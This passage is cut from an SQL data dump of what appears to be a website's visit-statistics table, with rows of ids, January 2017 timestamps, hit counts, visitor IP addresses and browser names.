,1,0,0,'141.8.183.25','other'),(85321,1485427216,1,1,0,0,'91.196.178.72','other'),(85322,1485427585,1,1,0,0,'141.8.142.61','other'),(85323,1485427987,2,2,0,0,'5.255.253.10','other'),(85324,1485428220,1,1,0,0,'95.133.152.77','firefox'),(85325,1485428492,1,1,0,0,'141.8.142.155','other'),(85326,1485428569,1,1,0,0,'37.54.18.222','opera'),(85327,1485428811,1,1,0,0,'91.196.177.26','chrome'),(85328,1485428872,1,1,0,0,'91.196.178.71','chrome'),(85329,1485428908,3,3,0,0,'141.8.183.25','other'),(85330,1485428979,1,1,0,0,'141.8.142.175','other'),(85331,1485429119,1,1,0,0,'66.249.93.70','chrome'),(85332,1485429154,1,1,0,0,'91.196.178.67','firefox'),(85333,1485429450,1,1,0,0,'37.53.230.102','chrome'),(85334,1485429663,1,1,0,0,'91.196.178.136','firefox'),(85335,1485429925,2,2,0,0,'141.8.142.175','other'),(85336,1485429976,1,1,0,0,'130.193.51.19','other'),(85337,1485430235,1,1,0,0,'141.8.183.25','other'),(85338,1485430392,4,4,0,0,'130.193.50.34','other'),(85339,1485430565,1,1,0,0,'46.201.130.9','opera'),(85340,1485430585,1,0,1,0,'66.249.64.123',''),(85341,1485430716,1,1,0,0,'66.249.64.61','chrome'),(85342,1485430773,1,1,0,0,'51.15.38.147','other'),(85343,1485430932,2,2,0,0,'141.8.142.175','other'),(85344,1485430994,1,1,0,0,'40.77.167.0','other'),(85345,1485431160,1,1,0,0,'91.195.3.24','chrome'),(85346,1485431499,1,1,0,0,'217.69.133.70','other'),(85347,1485431757,1,1,0,0,'130.193.51.19','other'),(85348,1485431984,1,1,0,0,'141.8.142.175','other'),(85349,1485432036,1,1,0,0,'91.196.178.33','firefox'),(85350,1485432192,1,1,0,0,'130.193.50.34','other'),(85351,1485432347,1,1,0,0,'130.193.50.32','other'),(85352,1485432547,1,1,0,0,'66.249.64.119','chrome'),(85353,1485432689,1,1,0,0,'5.255.253.67','other'),(85354,1485432692,1,1,0,0,'141.8.184.22','other'),(85355,1485432823,1,1,0,0,'163.172.64.180','other'),(85356,1485433082,2,2,0,0,'141.8.142.175','other'),(85357,1485433612,1,1,0,0,'5.255.253.10','other'),(85358,1485433805,1,1,0,0,'180.76.15.145','other'),(85359,1485434096,1,1,0,0,'46.219.2.151','msie'),(85360,1485434262,4,4,0,0,'141.8.183.25','other'),(85361,1485434286,1,1,0,0,'94.179.49.80','firefox'),(85362,1485434682,1,1,0,0,'141.8.142.58','other'),(85363,1485434740,1,0,1,0,'66.249.64.119',''),(85364,1485435012,1,1,0,0,'91.196.178.72','firefox'),(85365,1485435123,1,1,0,0,'5.58.138.69','chrome'),(85366,1485435198,2,2,0,0,'130.193.50.34','other'),(85367,1485435203,2,2,0,0,'130.193.51.19','other'),(85368,1485435294,1,1,0,0,'46.219.246.174','chrome'),(85369,1485435340,1,1,0,0,'46.133.97.27','chrome'),(85370,1485435489,1,1,0,0,'141.8.142.61','other'),(85371,1485435577,2,0,2,0,'66.249.64.61',''),(85372,1485435732,1,1,0,0,'46.200.253.252','chrome'),(85373,1485435875,1,1,0,0,'95.135.38.239','chrome'),(85374,1485435944,1,1,0,0,'141.8.183.25','other'),(85375,1485436118,1,1,0,0,'178.214.177.26','chrome'),(85376,1485436837,1,1,0,0,'82.145.221.44','chrome'),(85377,1485436844,1,1,0,0,'141.8.142.67','other'),(85378,1485437577,1,1,0,0,'82.145.221.128','chrome'),(85379,1485437666,1,1,0,0,'178.92.210.198','chrome'),(85380,1485437841,1,1,0,0,'141.8.142.58','other'),(85381,1485437843,1,1,0,0,'141.8.142.61','other'),(85382,1485437894,1,1,0,0,'141.8.142.175','other'),(85383,1485438000,1,0,1,0,'68.180.229.254',''),(85384,1485438029,1,0,1,0,'66.249.64.59',''),(85385,1485438281,1,1,0,0,'91.196.178.163','chrome'),(85386,1485438403,2,2,0,0,'141.8.183.25','other'),(85387,1485438953,3,3,0,0,'141.8.142.175','other'),(85388,1485439580,1,0,1,0,'66.249.64.24',''),(85389,1485439898,1,0,1,0,'66.249.64.115',''),(85390,1485439901,1,1,0,0,'66.249.64.21','chrome'),(85391,1485440125,1,1,0,0,'130.193.50.34','other'),(85392,1485440170,1,1,0,0,'91.196.178.72','chrome'),(85393,1485440566,1,1,0,0,'94.179.112.60','chrome'),(85394,1485440744,1,1,0,0,'95.133.152.77','firefox'),(85395,1485441256,2,2,0,0,'130.193.50.34','other'),(85396,1485441383,1,1,0,0,'141.8.142.175','other'),(85397,1485441453,1,1,0,0,'141.8.183.25','other'),(85398,1485441945,1,1,0,0,'141.8.183.19','other'),(85399,1485441947,1,1,0,0,'141.8.142.67','other'),(85400,1485441998,1,1,0,0,'91.196.178.71','firefox'),(85401,1485442075,1,1,0,0,'5.255.253.67','other'),(85402,1485442085,1,1,0,0,'130.193.51.74','other'),(85403,1485442128,1,1,0,0,'178.92.171.229','firefox'),(85404,1485442340,1,1,0,0,'141.8.142.175','other'),(85405,1485442568,2,2,0,0,'141.8.142.58','other'),(85406,1485442570,3,3,0,0,'130.193.50.34','other'),(85407,1485442724,1,1,0,0,'93.158.152.84','other'),(85408,1485442984,4,4,0,0,'91.196.178.66','firefox'),(85409,1485443183,1,1,0,0,'91.196.178.71','firefox'),(85410,1485443517,1,1,0,0,'130.180.211.3','chrome'),(85411,1485443702,1,1,0,0,'91.196.177.15','chrome'),(85412,1485444029,1,1,0,0,'66.249.64.61','chrome'),(85413,1485444094,1,1,0,0,'141.8.142.175','other'),(85414,1485444489,1,1,0,0,'188.232.137.34','chrome'),(85415,1485444538,1,1,0,0,'130.193.50.34','other'),(85416,1485444785,1,1,0,0,'141.8.142.61','other'),(85417,1485445029,1,0,1,0,'66.249.64.21',''),(85418,1485445063,1,1,0,0,'66.102.9.29','chrome'),(85419,1485445327,1,1,0,0,'91.196.178.131','chrome'),(85420,1485445499,1,0,1,0,'66.249.64.115',''),(85421,1485445519,1,1,0,0,'5.255.253.47','other'),(85422,1485445929,1,1,0,0,'141.8.142.175','other'),(85423,1485446299,1,0,1,0,'66.249.64.21',''),(85424,1485446880,1,1,0,0,'141.8.183.25','other'),(85425,1485446959,2,2,0,0,'130.193.50.34','other'),(85426,1485446996,2,2,0,0,'130.193.51.19','other'),(85427,1485447224,2,2,0,0,'141.8.142.58','other'),(85428,1485447230,1,0,1,0,'66.249.64.119',''),(85429,1485447482,1,0,1,0,'66.249.64.59',''),(85430,1485447780,1,0,1,0,'66.249.64.123',''),(85431,1485447877,1,0,1,0,'66.249.64.61',''),(85432,1485447945,1,1,0,0,'130.193.51.19','other'),(85433,1485447995,1,1,0,0,'141.8.183.25','other'),(85434,1485448065,1,1,0,0,'141.8.142.67','other'),(85435,1485448294,1,1,0,0,'141.8.142.61','other'),(85436,1485448626,1,1,0,0,'141.8.142.58','other'),(85437,1485448995,1,1,0,0,'141.8.183.25','other'),(85438,1485449000,1,1,0,0,'130.193.50.34','other'),(85439,1485449024,1,1,0,0,'141.8.142.175','other'),(85440,1485449413,2,2,0,0,'130.193.51.19','other'),(85441,1485450735,1,1,0,0,'94.179.53.113','firefox'),(85442,1485451058,1,1,0,0,'91.196.178.35','chrome'),(85443,1485452653,1,1,0,0,'66.249.64.74','chrome'),(85444,1485452957,1,1,0,0,'46.211.70.59','chrome'),(85445,1485453305,1,1,0,0,'91.196.178.67','firefox'),(85446,1485453309,1,1,0,0,'91.196.178.161','chrome'),(85447,1485454391,1,0,1,0,'66.249.64.79',''),(85448,1485455058,1,0,1,0,'66.249.64.27',''),(85449,1485456403,1,1,0,0,'37.52.115.190','chrome'),(85450,1485456514,1,1,0,0,'130.193.50.6','other'),(85451,1485456901,1,1,0,0,'194.44.196.126','chrome'),(85452,1485457926,1,1,0,0,'66.249.64.115','chrome'),(85453,1485459484,1,1,0,0,'130.180.209.155','chrome'),(85454,1485459608,1,1,0,0,'91.196.178.72','chrome'),(85455,1485459713,2,2,0,0,'46.211.4.0','chrome'),(85456,1485459740,2,2,0,0,'130.193.50.34','other'),(85457,1485459823,1,1,0,0,'141.8.142.58','other'),(85458,1485462861,1,0,1,0,'66.249.64.74',''),(85459,1485463969,1,1,0,0,'217.69.133.70','other'),(85460,1485464793,1,1,0,0,'141.8.183.25','other'),(85461,1485465321,1,1,0,0,'180.76.15.29','other'),(85462,1485465816,1,1,0,0,'66.249.64.24','chrome'),(85463,1485466978,1,1,0,0,'130.193.50.34','other'),(85464,1485467169,1,1,0,0,'130.180.219.129','chrome'),(85465,1485467211,1,0,1,0,'66.249.64.119',''),(85466,1485468188,1,1,0,0,'46.165.197.142','other'),(85467,1485469040,1,1,0,0,'130.180.219.129','chrome'),(85468,1485472489,1,1,0,0,'130.193.50.34','other'),(85469,1485472776,1,0,1,0,'66.249.64.69',''),(85470,1485475123,1,0,1,0,'66.249.64.57',''),(85471,1485475192,1,1,0,0,'141.8.142.175','other'),(85472,1485476039,1,1,0,0,'130.193.50.34','other'),(85473,1485478198,1,0,1,0,'66.249.64.24',''),(85474,1485478243,1,0,1,0,'66.249.64.119',''),(85475,1485478303,1,0,1,0,'66.249.64.27',''),(85476,1485478528,1,0,1,0,'66.249.64.74',''),(85477,1485479177,1,1,0,0,'217.69.133.239','other'),(85478,1485479828,1,1,0,0,'141.8.183.25','other'),(85479,1485480351,1,1,0,0,'141.8.142.61','other'),(85480,1485481889,1,0,1,0,'66.249.64.27',''),(85481,1485482689,1,1,0,0,'130.193.50.34','other'),(85482,1485484064,1,1,0,0,'130.193.50.34','other'),(85483,1485484244,1,1,0,0,'180.76.15.138','other'),(85484,1485484853,1,1,0,0,'141.8.142.67','other'),(85485,1485485455,1,0,1,0,'66.249.64.21',''),(85486,1485486272,1,1,0,0,'141.8.142.175','other'),(85487,1485487250,1,1,0,0,'207.46.13.30','other'),(85488,1485487627,1,1,0,0,'130.193.50.34','other'),(85489,1485487849,1,1,0,0,'85.93.218.204','chrome'),(85490,1485488471,1,0,1,0,'66.249.64.115',''),(85491,1485491729,1,1,0,0,'141.8.183.25','other'),(85492,1485494395,1,1,0,0,'66.102.9.29','chrome'),(85493,1485495565,1,1,0,0,'130.193.50.34','other'),(85494,1485495988,1,1,0,0,'91.196.178.68','firefox'),(85495,1485497531,1,1,0,0,'91.196.178.68','firefox'),(85496,1485497683,1,1,0,0,'91.196.178.72','firefox'),(85497,1485498279,1,1,0,0,'130.193.50.34','other'),(85498,1485498817,1,0,1,0,'66.249.64.59',''),(85499,1485498906,1,1,0,0,'91.196.178.67','chrome'),(85500,1485499140,1,1,0,0,'66.249.93.13','chrome'),(85501,1485499818,1,1,0,0,'91.196.178.66','firefox'),(85502,1485500323,1,1,0,0,'91.196.178.68','firefox'),(85503,1485501044,1,0,1,0,'66.249.64.115',''),(85504,1485501186,1,1,0,0,'141.8.142.61','other'),(85505,1485501537,1,1,0,0,'130.193.51.19','other'),(85506,1485501650,1,1,0,0,'141.8.183.25','other'),(85507,1485501800,1,1,0,0,'91.214.163.30','chrome'),(85508,1485502294,1,1,0,0,'91.196.178.68','chrome'),(85509,1485503046,1,1,0,0,'178.94.63.18','chrome'),(85510,1485504204,1,1,0,0,'82.207.91.234','firefox'),(85511,1485504393,3,3,0,0,'130.193.50.34','other'),(85512,1485504607,1,1,0,0,'141.8.183.25','other'),(85513,1485504734,1,1,0,0,'141.8.142.175','other'),(85514,1485504755,1,1,0,0,'141.8.142.58','other'),(85515,1485504941,1,1,0,0,'91.196.178.135','firefox'),(85516,1485505531,1,1,0,0,'46.201.241.5','chrome'),(85517,1485506075,1,1,0,0,'95.135.53.50','chrome'),(85518,1485506093,1,1,0,0,'130.193.51.19','other'),(85519,1485506972,27,27,0,0,'158.69.228.25','chrome'),(85520,1485506982,1,1,0,0,'91.196.178.66','firefox'),(85521,1485507705,1,1,0,0,'144.76.38.79','other'),(85522,1485507968,1,1,0,0,'95.135.90.23','chrome'),(85523,1485508959,1,1,0,0,'130.193.51.19','other'),(85524,1485509337,1,1,0,0,'91.196.177.46','firefox'),(85525,1485510233,1,0,1,0,'66.249.64.119',''),(85526,1485510470,2,2,0,0,'141.8.183.25','other'),(85527,1485510480,2,2,0,0,'130.193.51.19','other'),(85528,1485511047,1,1,0,0,'91.124.129.224','chrome'),(85529,1485511387,1,1,0,0,'141.8.142.61','other'),(85530,1485511791,1,1,0,0,'130.193.50.34','other'),(85531,1485512039,1,1,0,0,'141.8.142.175','other'),(85532,1485512098,1,1,0,0,'37.53.137.111','chrome'),(85533,1485512643,1,1,0,0,'130.193.51.19','other'),(85534,1485512983,1,1,0,0,'91.196.178.68','firefox'),(85535,1485513193,1,1,0,0,'91.196.178.69','chrome'),(85536,1485514282,1,1,0,0,'193.107.72.82','other'),(85537,1485514295,1,1,0,0,'141.8.142.175','other'),(85538,1485514703,1,1,0,0,'130.193.50.34','other'),(85539,1485514937,1,1,0,0,'91.196.178.66','firefox'),(85540,1485515084,1,1,0,0,'91.196.178.66','chrome'),(85541,1485515092,1,1,0,0,'178.94.58.199','chrome'),(85542,1485515305,1,1,0,0,'141.8.183.25','other'),(85543,1485515370,1,1,0,0,'95.132.59.179','firefox'),(85544,1485515868,1,1,0,0,'37.73.217.249','chrome'),(85545,1485515889,1,1,0,0,'185.8.236.222','other'),(85546,1485516234,1,1,0,0,'37.73.243.147','chrome'),(85547,1485516366,1,1,0,0,'91.196.178.72','chrome'),(85548,1485516589,1,1,0,0,'212.1.76.228','chrome'),(85549,1485516866,1,0,1,0,'66.249.64.115',''),(85550,1485517234,1,1,0,0,'141.8.142.175','other'),(85551,1485517412,1,1,0,0,'37.53.137.111','chrome'),(85552,1485518492,1,1,0,0,'93.74.245.82','chrome'),(85553,1485518868,1,1,0,0,'185.41.23.2','chrome'),(85554,1485519205,1,1,0,0,'141.8.183.25','other'),(85555,1485519243,2,2,0,0,'130.193.51.19','other'),(85556,1485519815,1,1,0,0,'92.112.58.47','chrome'),(85557,1485519850,1,1,0,0,'91.196.178.161','chrome'),(85558,1485519922,1,1,0,0,'66.249.93.14','chrome'),(85559,1485519975,1,1,0,0,'141.8.142.61','other'),(85560,1485520006,1,1,0,0,'141.8.142.175','other'),(85561,1485520031,1,1,0,0,'91.196.178.69','chrome'),(85562,1485520203,1,1,0,0,'130.193.51.19','other'),(85563,1485520311,1,1,0,0,'162.210.196.98','other'),(85564,1485520345,1,1,0,0,'178.93.130.61','chrome'),(85565,1485520494,1,1,0,0,'91.196.177.46','chrome'),(85566,1485520611,1,0,1,0,'66.249.64.61',''),(85567,1485520903,1,0,1,0,'66.249.64.119',''),(85568,1485521121,1,1,0,0,'141.8.142.175','other'),(85569,1485521125,1,1,0,0,'141.8.142.58','other'),(85570,1485522010,1,1,0,0,'37.54.17.87','firefox'),(85571,1485522059,1,1,0,0,'163.172.64.243','other'),(85572,1485522126,1,1,0,0,'91.196.178.69','chrome'),(85573,1485522403,1,0,1,0,'66.249.64.115',''),(85574,1485523364,2,2,0,0,'37.53.122.223','chrome'),(85575,1485523444,2,2,0,0,'195.69.222.18','chrome'),(85576,1485524619,1,1,0,0,'130.193.50.34','other'),(85577,1485524843,1,1,0,0,'91.196.178.164','chrome'),(85578,1485525112,2,2,0,0,'141.8.183.25','other'),(85579,1485525300,1,1,0,0,'141.8.142.175','other'),(85580,1485525602,1,1,0,0,'163.172.64.231','other'),(85581,1485526223,2,2,0,0,'141.8.142.175','other'),(85582,1485526946,3,3,0,0,'130.193.50.34','other'),(85583,1485527005,1,1,0,0,'141.8.183.25','other'),(85584,1485527013,1,1,0,0,'130.180.217.10','firefox'),(85585,1485527324,1,0,1,0,'68.180.229.254',''),(85586,1485528597,1,1,0,0,'141.8.142.58','other'),(85587,1485528885,1,1,0,0,'130.193.51.19','other'),(85588,1485529057,1,0,1,0,'66.249.64.24',''),(85589,1485529344,1,1,0,0,'93.158.152.51','other'),(85590,1485529456,1,1,0,0,'141.8.142.175','other'),(85591,1485529714,1,1,0,0,'178.154.189.37','other'),(85592,1485529754,1,1,0,0,'141.8.142.61','other'),(85593,1485530133,1,1,0,0,'130.193.51.19','other'),(85594,1485532843,1,1,0,0,'141.8.142.61','other'),(85595,1485532888,1,1,0,0,'130.193.50.34','other'),(85596,1485532956,1,1,0,0,'91.196.178.33','chrome'),(85597,1485534308,1,0,1,0,'66.249.64.21',''),(85598,1485534427,1,1,0,0,'37.54.17.87','firefox'),(85599,1485536119,1,1,0,0,'141.8.142.61','other'),(85600,1485536873,1,1,0,0,'163.172.64.182','other'),(85601,1485537416,1,0,1,0,'66.249.64.61',''),(85602,1485537430,1,1,0,0,'163.172.64.180','other'),(85603,1485537442,2,0,2,0,'66.249.64.59',''),(85604,1485537610,1,0,1,0,'66.249.64.123',''),(85605,1485537663,1,0,1,0,'66.249.64.119',''),(85606,1485537933,1,1,0,0,'141.8.183.25','other'),(85607,1485538004,1,1,0,0,'130.193.50.34','other'),(85608,1485538018,2,2,0,0,'141.8.142.175','other'),(85609,1485538439,1,0,1,0,'66.249.64.59',''),(85610,1485538823,1,1,0,0,'130.180.209.100','chrome'),(85611,1485539241,1,1,0,0,'130.180.220.14','chrome'),(85612,1485539813,1,1,0,0,'141.8.183.25','other'),(85613,1485540207,1,1,0,0,'66.249.64.57','chrome'),(85614,1485540673,1,1,0,0,'66.249.64.115','chrome'),(85615,1485540720,1,1,0,0,'66.249.64.69','chrome'),(85616,1485541145,1,1,0,0,'193.160.226.65','firefox'),(85617,1485541150,1,1,0,0,'66.102.9.25','chrome'),(85618,1485541163,1,1,0,0,'93.158.152.84','other'),(85619,1485541168,1,1,0,0,'180.76.15.135','other'),(85620,1485541370,1,1,0,0,'46.133.117.111','chrome'),(85621,1485541390,1,1,0,0,'91.196.178.68','firefox'),(85622,1485541458,2,2,0,0,'141.8.183.25','other'),(85623,1485541550,1,1,0,0,'163.172.64.180','other'),(85624,1485542632,1,1,0,0,'130.193.51.19','other'),(85625,1485542810,1,1,0,0,'141.8.183.25','other'),(85626,1485543244,1,1,0,0,'66.102.9.25','chrome'),(85627,1485545263,2,2,0,0,'130.193.50.34','other'),(85628,1485546140,1,1,0,0,'46.211.157.130','chrome'),(85629,1485546579,2,2,0,0,'130.193.50.34','other'),(85630,1485548100,1,1,0,0,'163.172.64.227','other'),(85631,1485548504,1,1,0,0,'141.8.183.25','other'),(85632,1485549383,2,2,0,0,'141.8.142.175','other'),(85633,1485549818,2,2,0,0,'46.211.115.125','other'),(85634,1485550428,1,1,0,0,'94.179.6.173','chrome'),(85635,1485550937,1,1,0,0,'141.8.142.175','other'),(85636,1485552357,1,1,0,0,'157.55.39.18','other'),(85637,1485553547,1,1,0,0,'130.193.50.34','other'),(85638,1485553767,1,1,0,0,'141.8.142.58','other'),(85639,1485553869,1,0,1,0,'66.249.64.21',''),(85640,1485554370,2,0,2,0,'66.249.64.27',''),(85641,1485554796,1,1,0,0,'141.8.142.175','other'),(85642,1485555242,1,1,0,0,'141.8.142.58','other'),(85643,1485555278,1,1,0,0,'207.46.13.212','other'),(85644,1485557482,2,2,0,0,'130.193.50.34','other'),(85645,1485557599,1,1,0,0,'141.8.142.175','other'),(85646,1485557729,1,1,0,0,'93.158.152.84','other'),(85647,1485557733,1,1,0,0,'141.8.183.19','other'),(85648,1485558034,2,2,0,0,'130.193.51.19','other'),(85649,1485558140,1,1,0,0,'141.8.183.25','other'),(85650,1485560423,1,1,0,0,'130.193.50.34','other'),(85651,1485560832,1,1,0,0,'141.8.142.175','other'),(85652,1485561743,1,1,0,0,'207.46.13.158','other'),(85653,1485562225,1,1,0,0,'130.193.51.19','other'),(85654,1485562428,1,0,1,0,'66.249.64.27',''),(85655,1485562800,1,1,0,0,'141.8.142.67','other'),(85656,1485562945,1,1,0,0,'130.193.50.34','other'),(85657,1485564911,1,0,1,0,'66.249.64.69',''),(85658,1485565048,1,0,1,0,'66.249.64.24',''),(85659,1485568595,1,1,0,0,'141.8.142.67','other'),(85660,1485569120,1,1,0,0,'141.8.142.61','other'),(85661,1485569364,1,1,0,0,'141.8.142.58','other'),(85662,1485569571,1,1,0,0,'141.8.142.175','other'),(85663,1485570658,1,1,0,0,'141.8.142.58','other'),(85664,1485571536,1,0,1,0,'66.249.64.27',''),(85665,1485571744,2,2,0,0,'141.8.142.58','other'),(85666,1485571880,1,1,0,0,'141.8.132.10','other'),(85667,1485571894,1,0,1,0,'66.249.64.74',''),(85668,1485572052,1,1,0,0,'178.154.189.31','other'),(85669,1485572190,1,1,0,0,'93.158.152.40','other'),(85670,1485572294,1,1,0,0,'141.8.142.85','other'),(85671,1485572436,2,2,0,0,'93.158.152.84','other'),(85672,1485572604,1,1,0,0,'141.8.142.67','other'),(85673,1485572780,1,1,0,0,'141.8.142.175','other'),(85674,1485572959,1,1,0,0,'141.8.142.58','other'),(85675,1485573129,1,1,0,0,'130.193.50.34','other'),(85676,1485573523,2,2,0,0,'141.8.183.25','other'),(85677,1485573981,1,0,1,0,'66.249.64.21',''),(85678,1485574158,1,1,0,0,'130.193.51.43','other'),(85679,1485574161,1,1,0,0,'5.255.253.68','other'),(85680,1485574237,1,0,1,0,'66.249.64.74',''),(85681,1485574498,1,1,0,0,'178.154.149.11','other'),(85682,1485574869,1,1,0,0,'141.8.142.58','other'),(85683,1485575349,1,1,0,0,'130.193.50.38','other'),(85684,1485575632,1,1,0,0,'93.158.152.40','other'),(85685,1485575679,2,2,0,0,'5.255.253.67','other'),(85686,1485575734,2,2,0,0,'141.8.142.62','other'),(85687,1485575776,3,3,0,0,'93.158.152.51','other'),(85688,1485575786,2,2,0,0,'141.8.183.25','other'),(85689,1485575938,1,1,0,0,'130.193.50.6','other'),(85690,1485575945,1,1,0,0,'5.255.253.47','other'),(85691,1485575948,1,1,0,0,'178.154.189.37','other'),(85692,1485575957,1,1,0,0,'141.8.142.58','other'),(85693,1485576141,1,0,1,0,'66.249.64.79',''),(85694,1485576588,1,1,0,0,'66.249.64.79','chrome'),(85695,1485576995,1,1,0,0,'157.55.39.137','other'),(85696,1485578538,1,1,0,0,'141.8.142.61','other'),(85697,1485579367,1,0,1,0,'66.249.64.24',''),(85698,1485579844,1,1,0,0,'141.8.142.67','other'),(85699,1485580311,1,1,0,0,'130.193.50.34','other'),(85700,1485582394,1,1,0,0,'141.8.142.67','other'),(85701,1485582614,1,1,0,0,'5.255.253.47','other'),(85702,1485583401,1,1,0,0,'130.193.51.19','other'),(85703,1485584934,1,0,1,0,'66.249.64.21',''),(85704,1485585018,2,0,2,0,'66.249.64.24',''),(85705,1485585333,1,1,0,0,'141.8.142.175','other'),(85706,1485585501,1,1,0,0,'178.154.149.10','other'),(85707,1485585533,2,2,0,0,'95.213.141.126','opera'),(85708,1485585546,1,1,0,0,'141.8.142.25','other'),(85709,1485585548,1,1,0,0,'141.8.142.171','other'),(85710,1485585742,1,1,0,0,'141.8.142.206','other'),(85711,1485585960,1,1,0,0,'130.193.51.19','other'),(85712,1485586423,1,1,0,0,'180.76.15.162','other'),(85713,1485587136,1,1,0,0,'107.167.110.12','other'),(85714,1485587262,1,1,0,0,'130.193.51.14','other'),(85715,1485587299,1,1,0,0,'141.8.142.85','other'),(85716,1485587306,1,1,0,0,'141.8.132.30','other'),(85717,1485587409,1,1,0,0,'141.8.142.58','other'),(85718,1485588192,1,0,1,0,'66.249.64.27',''),(85719,1485588512,1,1,0,0,'130.193.50.34','other'),(85720,1485588896,1,0,1,0,'68.180.229.190',''),(85721,1485588987,1,1,0,0,'94.179.125.46','chrome'),(85722,1485589395,1,1,0,0,'130.193.51.14','other'),(85723,1485589398,1,1,0,0,'130.193.37.21','other'),(85724,1485589495,1,1,0,0,'141.8.142.61','other'),(85725,1485589506,1,1,0,0,'66.249.93.91','chrome'),(85726,1485589536,1,1,0,0,'176.118.48.36','chrome'),(85727,1485589885,1,0,1,0,'66.249.64.27',''),(85728,1485589918,1,0,1,0,'66.249.64.69',''),(85729,1485590081,1,1,0,0,'193.160.226.65','firefox'),(85730,1485591681,1,1,0,0,'66.249.64.79','chrome'),(85731,1485592625,1,0,1,0,'66.249.64.27',''),(85732,1485593914,1,1,0,0,'66.249.64.21','chrome'),(85733,1485594880,1,1,0,0,'157.55.39.18','other'),(85734,1485595351,1,1,0,0,'130.193.50.34','other'),(85735,1485595352,1,1,0,0,'141.8.142.175','other'),(85736,1485595513,1,0,1,0,'66.249.64.27',''),(85737,1485596897,1,1,0,0,'141.8.183.25','other'),(85738,1485597623,1,1,0,0,'193.194.127.217','firefox'),(85739,1485598180,1,1,0,0,'92.113.156.197','chrome'),(85740,1485599037,1,1,0,0,'91.196.178.34','chrome'),(85741,1485600635,1,1,0,0,'91.196.178.35','chrome'),(85742,1485601807,1,1,0,0,'157.55.39.137','other'),(85743,1485603112,1,0,1,0,'66.249.64.74',''),(85744,1485605061,1,1,0,0,'62.212.73.211','other'),(85745,1485606716,1,0,1,0,'68.180.229.190',''),(85746,1485606960,1,1,0,0,'5.58.63.215','firefox'),(85747,1485609951,1,1,0,0,'141.0.12.250','other'),(85748,1485611566,2,2,0,0,'66.249.93.157','chrome'),(85749,1485611936,1,1,0,0,'207.46.13.158','other'),(85750,1485612304,1,1,0,0,'83.170.203.142','other'),(85751,1485613241,1,1,0,0,'91.196.178.33','chrome'),(85752,1485613562,1,1,0,0,'92.112.162.165','firefox'),(85753,1485613689,1,0,1,0,'66.249.64.79',''),(85754,1485613848,1,0,1,0,'66.249.64.24',''),(85755,1485613979,1,0,1,0,'66.249.64.69',''),(85756,1485614103,1,0,1,0,'66.249.64.21',''),(85757,1485614918,1,0,1,0,'66.249.64.27',''),(85758,1485617712,1,0,1,0,'68.180.229.254',''),(85759,1485618629,1,0,1,0,'66.249.64.24',''),(85760,1485619218,1,1,0,0,'93.158.152.40','other'),(85761,1485619564,1,0,1,0,'66.249.64.21',''),(85762,1485620244,1,1,0,0,'5.255.253.9','other'),(85763,1485621025,1,1,0,0,'141.8.142.10','other'),(85764,1485621297,1,1,0,0,'94.179.75.238','firefox'),(85765,1485621482,1,1,0,0,'91.196.178.34','chrome'),(85766,1485621741,1,1,0,0,'141.8.142.153','other'),(85767,1485621849,1,1,0,0,'141.8.132.52','other'),(85768,1485622496,1,1,0,0,'141.8.142.155','other'),(85769,1485622500,1,1,0,0,'178.154.149.10','other'),(85770,1485622666,1,1,0,0,'141.8.142.167','other'),(85771,1485623210,2,2,0,0,'93.158.152.84','other'),(85772,1485623547,1,1,0,0,'141.8.142.25','other'),(85773,1485624862,1,0,1,0,'68.180.229.187',''),(85774,1485626204,1,1,0,0,'130.193.51.19','other'),(85775,1485626270,1,1,0,0,'130.193.50.34','other'),(85776,1485626391,2,2,0,0,'141.8.183.25','other'),(85777,1485626506,1,1,0,0,'141.8.142.175','other'),(85778,1485626924,1,1,0,0,'141.8.142.58','other'),(85779,1485627510,1,1,0,0,'141.8.142.175','other'),(85780,1485627563,1,1,0,0,'141.8.183.25','other'),(85781,1485628427,2,2,0,0,'130.193.51.19','other'),(85782,1485628688,2,2,0,0,'141.8.142.58','other'),(85783,1485628961,1,1,0,0,'5.255.253.68','other'),(85784,1485629675,1,1,0,0,'130.193.51.19','other'),(85785,1485629777,1,1,0,0,'207.46.13.212','other'),(85786,1485629868,1,1,0,0,'94.179.28.80','chrome'),(85787,1485630040,1,1,0,0,'46.201.175.171','firefox'),(85788,1485630553,1,1,0,0,'130.193.51.74','other'),(85789,1485630556,1,1,0,0,'141.8.132.10','other'),(85790,1485630646,1,1,0,0,'93.158.152.84','other'),(85791,1485630849,1,1,0,0,'141.8.142.58','other'),(85792,1485632695,1,1,0,0,'141.8.142.58','other'),(85793,1485634809,1,1,0,0,'66.249.64.74','chrome'),(85794,1485635538,1,0,1,0,'66.249.64.79',''),(85795,1485635695,1,1,0,0,'141.8.142.175','other'),(85796,1485637666,1,1,0,0,'130.193.50.34','other'),(85797,1485640626,1,1,0,0,'130.193.50.34','other'),(85798,1485640658,1,1,0,0,'141.8.142.67','other'),(85799,1485640885,1,1,0,0,'130.193.51.19','other'),(85800,1485641409,1,0,1,0,'66.249.64.27',''),(85801,1485642502,1,1,0,0,'141.8.132.10','other'),(85802,1485643837,1,1,0,0,'141.8.142.25','other'),(85803,1485644237,1,0,1,0,'66.249.64.24',''),(85804,1485645255,1,1,0,0,'180.76.15.154','other'),(85805,1485647781,1,0,1,0,'66.249.64.79',''),(85806,1485648378,1,1,0,0,'141.8.142.61','other'),(85807,1485648381,1,1,0,0,'141.8.142.67','other'),(85808,1485648912,1,1,0,0,'141.8.132.10','other'),(85809,1485648960,1,1,0,0,'207.46.13.158','other'),(85810,1485648985,1,1,0,0,'178.154.149.10','other'),(85811,1485649595,1,1,0,0,'130.193.51.19','other'),(85812,1485649718,1,1,0,0,'207.46.13.70','other'),(85813,1485650228,1,1,0,0,'141.8.142.175','other'),(85814,1485650285,2,2,0,0,'141.8.183.25','other'),(85815,1485650490,1,1,0,0,'141.8.142.61','other'),(85816,1485650737,1,1,0,0,'130.193.51.19','other'),(85817,1485651708,3,3,0,0,'141.8.142.175','other'),(85818,1485651903,1,1,0,0,'141.8.183.25','other'),(85819,1485651935,1,1,0,0,'66.249.64.21','chrome'),(85820,1485651977,1,0,1,0,'66.249.64.27',''),(85821,1485652140,1,1,0,0,'141.8.132.10','other'),(85822,1485652246,1,1,0,0,'141.8.142.25','other'),(85823,1485652253,1,1,0,0,'207.46.13.70','other'),(85824,1485653054,1,1,0,0,'141.8.183.25','other'),(85825,1485653594,1,1,0,0,'93.158.152.40','other'),(85826,1485653991,1,0,1,0,'66.249.64.69',''),(85827,1485654070,1,1,0,0,'178.154.189.31','other'),(85828,1485654073,1,1,0,0,'178.154.149.11','other'),(85829,1485658047,1,0,1,0,'66.249.64.24',''),(85830,1485658680,1,0,1,0,'66.249.64.21',''